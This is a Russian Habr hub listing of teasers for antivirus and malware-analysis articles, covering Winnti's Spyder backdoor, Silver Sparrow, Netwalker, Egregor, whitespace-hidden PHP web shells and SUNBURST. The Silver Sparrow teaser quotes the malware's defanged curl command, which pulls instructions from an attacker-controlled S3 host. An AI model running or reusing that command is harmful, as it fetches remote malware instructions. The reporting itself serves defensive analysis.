Как стать автором
Обновить
0.88

Антивирусная защита *

Защита компьютерных систем от вредоносного ПО

Сначала показывать
Порог рейтинга
Уровень сложности

Исследуем Spyder – еще один бэкдор группировки Winnti

Время на прочтение 12 мин
Количество просмотров 3K

В конце прошлого года в нашу лабораторию за помощью обратилась зарубежная телекоммуникационная компания, сотрудники которой обнаружили в корпоративной сети подозрительные файлы. В ходе поиска следов вредоносной активности аналитики выявили образец весьма интересного бэкдора. Его анализ показал, что мы имеем дело с очередным модульным APT-бэкдором, использующимся хакерской группой Winnti.

Последний раз деятельность Winnti попадала в наше поле зрения, когда мы анализировали модификации бэкдоров ShadowPad и PlugX в рамках расследования атак на государственные учреждения стран Центральной Азии. Оба эти семейства оказались схожи концептуально и имели примечательные пересечения в коде. Сравнительному анализу ShadowPad и PlugX был посвящен отдельный материал.

В сегодняшней статье мы разберем бэкдор Spyder именно так окрестили найденный вредоносный модуль наши вирусные аналитики. Мы рассмотрим алгоритмы и особенности его работы и выявим его связь с другими известными инструментами APT-группы Winnti.

Читать далее
Всего голосов 11: ↑11 и ↓0 +11
Комментарии 0

Сказ о том, как я с гидрой боролся

Время на прочтение 6 мин
Количество просмотров 16K

На Хабре принято рассказывать про красивое программирование... Увы, в суровой практике такой красоты пока не встретил. Зато ввязался в эпичную битву: адский легаси, shared-хостинг с кучей сайтов и старый Битрикс с вирусами против самописного сканера на PHP. Даже как-то неприлично про такое вслух... Но сканер наверняка кому-то пригодится!

Читать далее
Всего голосов 28: ↑27 и ↓1 +26
Комментарии 28

Antilocker: защита от шифровальщиков

Время на прочтение 1 мин
Количество просмотров 1.2K

AntiLocker использует ведение динамических списков файлов, к которым осуществляет доступ приложение или группа приложений, чтобы использовать их при контроле доступа со стороны других приложений (шифровальщиков). Система полностью автоматизирована и позволяет защищать систему от ransomware даже без использования баз сигнатур.

Читать далее
Рейтинг 0
Комментарии 0

Атаки злоумышленников и уязвимости. При чем здесь коммерческий SOC?

Время на прочтение 5 мин
Количество просмотров 28K

Введение


Делая выбор в пользу подключения к SOC (Security Operations Center), компания, зачастую, рассматривает провайдера как «подстраховку» в работе со сложными инцидентами и угрозами, справиться с которыми своими силами для нее потенциально было бы затруднительно. При этом часто бывает, что уже на этапе пилотного тестирования сервиса проявляются узкие места или критичные недоработки в существующей стратегии обеспечения информационной устойчивости цифровых активов. Именно поэтому SOC – это совместный «путь», где компания и провайдер сервиса идут рука об руку, дополняя и помогая друг другу на всей дистанции.



Рис. 1. Распространенные слабые места у компаний

Мы накопили многолетний опыт по обеспечению информационной безопасности: как своей собственной, так и наших клиентов. И хотим им поделиться с читателями. В рамках этой статьи будут приведены несколько кейсов, успешно предотвращенных нашим коммерческим SOC. Из них можно извлечь для себя немало полезного.
Читать дальше →
Всего голосов 2: ↑1 и ↓1 0
Комментарии 4

Истории

На 30 тысячах компьютеров с macOS нашли странный зловред, который ждёт команду

Время на прочтение 4 мин
Количество просмотров 22K


Новая вредоносная программа Silver Sparrow («Серебряный воробей»), обнаруженная почти на 30 000 компьютерах Mac по всему миру, привлекла внимание специалистов по безопасности. Причин несколько. Во-первых, зловред поставляется в двух бинарниках, в том числе для процессора М1. Во-вторых, исследователи не могут понять цель злоумышленников.

Раз в час заражённые компьютеры проверяют контрольный сервер на предмет новых команд или двоичных файлов для выполнения:

curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.json
plutil -convert xml1 -r /tmp/version.json -o /tmp/version.plist
Читать дальше →
Всего голосов 28: ↑25 и ↓3 +22
Комментарии 30
Сижу, никого не трогаю, и тут на мой телефон начинают сыпаться уведомления от Steam с кодами авторизации. Пришло писем 18, не меньше: оказалось, кто-то пытался угнать аккаунт сына. Хорошо, что я привязал его к собственной почте (карта-то моя!), потому что пароли у сына везде одинаковые. Очевидно, он вбил свой пароль на каком-то непонятном сайте и пароль тут же угнали. Позже я задумался, сколько же ещё дырок можно найти в безопасности моих домашних девайсов. Осознав масштабы проблемы, загорелся идеей защитить своих домашних и зоопарк их устройств — а попутно узнал кое-что интересное, чем и хочу с вами поделиться. Подробнее — под катом.
Читать дальше
Всего голосов 64: ↑38 и ↓26 +12
Комментарии 58

Всё, что нужно знать о программе-вымогателе Netwalker

Время на прочтение 8 мин
Количество просмотров 5.5K


В 2020 году киберпреступность росла в геометрической прогрессии: программы-вымогатели Emotet, Trickbot, Maze, Ryuk, а теперь и Netwalker стали серьезной проблемой во всех отраслях, больших и малых, государственных и частных, и пока нет оснований полагать, что эта тенденция ослабнет.

За 2019 год злоумышленники вымогательством получили от своих жертв около 11,5 миллиардов долларов. Для сравнения, в 2018 году эта цифра составила 8 миллиардов. По оценкам экспертов, к 2021 году потери от атак программ-вымогателей вырастут почти на 100% и достигнут 20 миллиардов долларов. С момента своих первых атак в марте 2020 года Netwalker, также известный как Mailto, позволил злоумышленникам получить в виде выкупа более 30 миллионов долларов.
Читать дальше →
Всего голосов 5: ↑4 и ↓1 +3
Комментарии 3

Невидимые символы, скрывающие веб-шелл в зловредном коде на PHP

Время на прочтение 5 мин
Количество просмотров 16K


В ноябре мы писали о том, как злоумышленники используют инъекции JavaScript для загрузки зловредного кода из файлов CSS.

Поначалу незаметно, что эти инъекции содержат что-то, кроме безобидных правил CSS. Однако при более тщательном анализе файла .CSS обнаруживается 56 964 кажущиеся пустыми строки, содержащие сочетания из невидимых символов табуляции (0x09), пробелов (0x20) и переводов строки (0x0A), которые преобразуются в двоичное представление символов, а затем в текст исполняемого кода на JavaScript.

Вскоре мы обнаружили такую же схему использования и во вредоносных программах на PHP. В статье мы расскажем о том, что обнаружил аналитик вредоносного ПО Лиам СмитSmith, работая недавно над сайтом, содержащим множество загружаемых хакерами бэкдоров и веб-шеллов.
Читать дальше →
Всего голосов 42: ↑42 и ↓0 +42
Комментарии 13

У Google появился новый креативный способ убивать SaaS-стартапы

Время на прочтение 7 мин
Количество просмотров 99K
В старые времена, когда компания Google (или любой из её плохо настроенных ИИ) хотела убить ваш бизнес, то обычно отказывала вам в доступе к какому-то из своих сервисов, и это работало. Вы наверняка слышали страшилки:



Клянусь, я прочитал FAQ!
Читать дальше →
Всего голосов 243: ↑243 и ↓0 +243
Комментарии 181

Взломы и Вакцины, всё как вы любите…

Время на прочтение 7 мин
Количество просмотров 17K

За ссылки и первую часть текста спасибо SecAtor.

Европейское медицинское агентство (ЕМА) признало на прошлой неделе факт утечки в сеть некоторых данных в отношении лекарств и вакцин от COVID-19, полученных хакерами в результате компрометации ее сети. При этом ЕМА сообщает, что на ее работу и работу европейской сети регулирования лекарственных средств инцидент никак не повлиял, утверждение и распространение вакцин не нарушено. Призывают уголовно наказать виновных если поймают. "Если" как лаконично высказались когда-то жители Лаконии.

twitter.com/CryptoInsane/status/1349835605027516417
twitter.com/CryptoInsane/status/1350006585641340929
Хакеры слили украденные данные в отношении вакцины Pfizer в паблик. Перуанский исследователь CryptoInsane разметил сегодня в Twitter два сообщения, в которых сообщил об утечках данных, вероятно через специализированные сайты. По первой части в комментариях поминается ransomware Conti, во второй solarleaks.net

И, наконец, завершающая часть - французские журналисты из Le Monde изучили утечку данных в отношении вакцины Pfizer и выяснили, что на EMA оказывалось давление со стороны руководства Евросоюза с целью оформить скорейшее одобрение файзеровской вакцины для применения в ЕС. При этом нарушения EMA выявило серьезные, вплоть до того, что применяемые в ходе клинических испытаний образцы вакцины не соответствовали тем, которые поставлялись для самой вакцинации.

Знаю, что многие на Хабре хотели привиться именно этой вакциной, ну потому что понятно, Европе как-то побольше доверия. Если вы уже кинули минус в карму автору, можете заглянуть под кат посмотреть подробности

того что накопали французские журналисты..
Всего голосов 63: ↑47 и ↓16 +31
Комментарии 89

Как я укололся китайской вакциной

Время на прочтение 9 мин
Количество просмотров 139K

В мире сейчас ведется несколько клинических исследований вакцин от коронавируса. В России, кроме «Спутника V» разработали «ЭпиВакКорона» и другие, но мне встретилась онлайн реклама участия в третьей фазе исследования вакцины китайской компании Cansino. И я пошел сдаваться китайцам на опыты, не дожидаясь встречи с вирусом.

Читать далее
Всего голосов 167: ↑153 и ↓14 +139
Комментарии 564

На волне тренда. Egregor ransomware — шифровальщик для целевых атак

Время на прочтение 4 мин
Количество просмотров 2.4K


На исходе каждого года, а также в первые дни января любая отрасль коллективно обсуждает тенденции и прогнозы, которые будут формировать нашу действительность на протяжении всего календаря. Большая и дружная IT-индустрия и, в частности, сфера информационной безопасности в лице многочисленных экспертов, энтузиастов и комьюнити активно протирают хрустальные шары и делятся видением ситуации. В основном в наступившем 2021-м предрекают дальнейшее распространение цифрового вымогательства, а точнее — целевых атак на крупные компании с целью не менее крупного шантажа.

Мы в «Доктор Веб» не очень любим давать прогнозы, но в ушедшем году атаки шифровальщиков сформировали настолько явную тенденцию, что есть все основания полагать: наконец-то предновогоднее предсказание сработает. Что, конечно же, добавит работы всем нам.
В качестве небольшой иллюстрации мы решили опубликовать небольшой разбор шифровальщика, который впервые был обнаружен в сентябре прошлого года, но уже успел натворить много бед. Его образец оказался в нашей вирусной лаборатории, после чего был подвергнут стандартной процедуре.
Читать дальше →
Всего голосов 10: ↑10 и ↓0 +10
Комментарии 1

Возможные способы организации атак на киберфизические системы

Время на прочтение 26 мин
Количество просмотров 4.7K

Киберфизические атаки — это особая категория кибератак, которые преднамеренно или нет также негативно влияют на физическое пространство нацеливаясь на вычислительную и коммуникационную инфраструктуру позволяющую людям и системам контролировать и контролировать датчики и исполнительные механизмы. Киберфизические атаки обычно рассматриваются в связи с киберфизическими системами и уязвимостью их вычислительных и коммуникационных элементов. Например, злоумышленник взявший под контроль вычислительные или коммуникационные компоненты водяных насосов, медицинских имплантатов автомобилей и клапанов газопроводов может использовать их для воздействия на физическое пространство, нанося ущерб имуществу или окружающей среде и подвергая риску жизни людей. В результате безопасность повсеместно рассматривается как одна из важнейших задач при проектировании надежных киберфизических систем. В дальнейшей работе цель состоит в том, чтобы получить более глубокое понимание угроз, с которыми сталкивается инфраструктура киберфизических систем, а также определить вероятность и последствия угроз для киберфизических систем.

Читать далее
Рейтинг 0
Комментарии 0

Ближайшие события

Московский туристический хакатон
Дата 23 марта – 7 апреля
Место
Москва Онлайн
Геймтон «DatsEdenSpace» от DatsTeam
Дата 5 – 6 апреля
Время 17:00 – 20:00
Место
Онлайн

SolarWinds и бэкдор SUNBURST: что скрывается внутри этой APT-кампании

Время на прочтение 9 мин
Количество просмотров 4.9K


Представьте, что все, у кого дома есть умная колонка Amazon Echo (Яндекс Алиса, Маруся – подставить подходящее), узнали бы, что на протяжении последних 6 месяцев она отпирала их дом и впускала воров внутрь. Как теперь чувствовать себя в безопасности, если злоумышленники могли сделать копии ваших ключей, документов, носителей информации или, например, отравить систему водоснабжения?

В таком положении сейчас находятся тысячи организаций, пострадавших от взлома цепочки поставок программного обеспечения компании SolarWinds при помощи вредоносного приложения Sunburst. Пострадавшие компании отчаянно ищут признаки компрометации, проводят внеочередной аудит безопасности инфраструктуры, а некоторые могут даже приостановить ряд сервисов до окончания расследования.
Читать дальше →
Всего голосов 3: ↑3 и ↓0 +3
Комментарии 0

Acronis Cyber Threats Report: 2021 станет годом вымогательства и краж данных

Время на прочтение 5 мин
Количество просмотров 1.2K

Всеобщая самоизоляция и удаленная работа повлияли на активность киберпреступников. Но хотя частота и методы атак изменились, сегодня угрозой №1 для бизнеса по-прежнему остается Ransomware. Этот тезис подтвердил отчет, подготовленный на базе информации из сети операционных центров киберзащиты Acronis (CPOC). Под катом — прогнозы на 2021, данные исследований, а также статистика и выводы.

Читать далее
Всего голосов 3: ↑3 и ↓0 +3
Комментарии 0

Детектирование аппаратных Троянских угроз с помощью алгоритмов машинного обучения

Время на прочтение 6 мин
Количество просмотров 2.4K

Все мы в какой-то степени подвержены Троянской угрозе сегодня. Любой девайс, который был куплен в ближайшем магазине под домом, может служить не только Вам, как потребителю, но и злоумышленнику в его целях. Потому угроза и названа Троянской: в древнегреческой мифологии есть случай захвата целой крепости с помощью подарка, который только на первый взгляд таким кажется. Что уж говорить о захвате данных современных пользователей: паролей, реквизитов, личных сообщений.

Читать далее
Всего голосов 20: ↑20 и ↓0 +20
Комментарии 7

EDR: откуда взялся и почему это очередной виток защиты от хакеров

Время на прочтение 7 мин
Количество просмотров 32K


Компьютеры всегда были полем боя. Вечная битва взлома и защиты началась с появления первого массового ПК и будет продолжаться пока существует человечество. Первые хакеры были исследователями, они искали способы оптимизировать вычисления, найти более эффективные режимы работы, выжать максимум из скудных возможностей компьютеров. Тогда еще не было термина “хакер”, людей, которые занимались “взломом”, сейчас бы назвали системными программистами и программистами микроконтроллеров, до сих пор бьющихся за каждый лишний байт и пишущих на низком уровне.

Сложно сказать, когда развлечение стало злонамеренным, а потом корыстным. Первоначально, порча данных или железа не приводила к выгоде, потому написание вирусов — был удел одиночек, любителей в хорошем смысле слова, людей не ищущих выгоды.

Все изменила сеть…

Предпосылки возникновения EDR


Очень долго, компьютерные вирусы были чрезвычайно специфическими программами. Им приходилось выживать в очень стесненных условиях слабых компьютеров с ограниченными ресурсами, авторы вирусов были гуру Ассемблера, досконально знали все тонкости работы компьютеров на низком уровне. Но компьютеры становились мощнее, их связала сеть и все это запахло большими деньгами. Взлом был поставлен на поток, теперь это серьезный и крупный бизнес, уязвимости продают за огромные деньги, основной трафик компьютерных сетей — DDoS. Таким же крупным бизнесом стала и защита от атак. Прошли те времена, когда антивирусные программы покупались на дискетах и защищали только один компьютер. Даже сами понятия “вирус” и “антивирус” уже устаревают, целью атак становятся целые организации, а занимаются этим уже не одиночки-энтузиасты.
Читать дальше →
Всего голосов 32: ↑30 и ↓2 +28
Комментарии 6

Whonix: руководство для начинающих

Время на прочтение 2 мин
Количество просмотров 90K


Whonix — это дистрибутив Linux на основе Debian, который разработан для обеспечения повышенной безопасности и конфиденциальности. Высокая анонимность достигается средствами VirtualBox и Tor. Whonix снижает угрозу от распространенных векторов атак, сохраняя при этом удобство использования.


Сильно перенастроенная база Debian запускается на нескольких виртуальных машинах, обеспечивая существенный уровень защиты от вредоносных программ и утечек IP-адресов.
Часто используемые приложения предварительно установлены и настроены, а при установке дополнительных приложений или персонализации рабочего стола пользователь не подвергается никакой опасности.


Whonix находится в стадии активной разработки и является единственной операционной системой, предназначенной для работы внутри виртуальной машины в сочетании с Tor.


Более подробно о Whonix и других ОС для безопасности.


Содержание:


  • Что нужно для работы с Whonix?
  • Что такое Whonix Gateway и Whonix Workstation?
  • Установка и настройка
  • Рекомендации по использованию

Что нужно для работы с Whonix?


  1. VirtualBox
  2. Непосредственно Whonix:
    • Whonix Gateway
    • Whonix Workstation

Сейчас оба идут в одном файле .ova


Что такое Whonix Gateway и Whonix Workstation?


  • Whonix Gateway – выступает в качестве шлюза во всемирную сеть, направляя весь трафик через сеть Tor.
  • Whonix Workstation — это место, где мы работаем как пользователь. Находится в полностью изолированной сети.

ПРИМЕЧАНИЕ: Помните, что нужно запустить Gateway и Workstation


Установка и настройка


Загружаем и устанавливаем VirtualBox.


Читать дальше →
Всего голосов 10: ↑8 и ↓2 +6
Комментарии 9

Как взламывают подключенные автомобили и что с этим делать

Время на прочтение 8 мин
Количество просмотров 6.1K
Подключённые к интернету автомобили с автопилотами, по сути, полуавтономные гаджеты на колёсах, сегодня учатся взаимодействовать со своими механическими собратьями, облачными сервисами и дорожной инфраструктурой, чтобы сделать движение безопаснее, помочь водителю принять правильное решение, а в критической ситуации отреагировать быстрее человека. Вместе с тем, электронная начинка и софт современных автомобилей имеют столько уязвимостей, что их взлом напоминает скорее движение по хайвею, чем бег с препятствиями. В этом посте мы поделимся результатами изучения безопасности современных автомобилей, собранными в исследовании компании Trend Micro, получившем название «Driving Security Into Connected Cars: Threat Model and Recommendations».

image
Читать дальше →
Всего голосов 11: ↑11 и ↓0 +11
Комментарии 2

Без шума и пыли: разбор RAT-троянов на базе Remote Utilities

Время на прочтение 8 мин
Количество просмотров 16K


В ноябре 2020 года вирусная лаборатория «Доктор Веб» зафиксировала рассылку фишинговых писем корпоративным пользователям. Злоумышленники попытались применить классический метод социальной инженерии, чтобы заставить потенциальных жертв открыть вложения. В качестве вредоносной нагрузки письма содержали троянские программы, обеспечивающие скрытую установку и запуск утилиты Remote Utilities, установочные компоненты которой также находились в составе вложения. При неблагоприятном стечении обстоятельств, компьютеры сотрудников были бы доступны для удаленного управления без каких-либо визуальных признаков работы программы. В статье мы рассмотрим механизмы распространения и заражения используемых RAT-троянов.
Читать дальше →
Всего голосов 3: ↑3 и ↓0 +3
Комментарии 2

Вклад авторов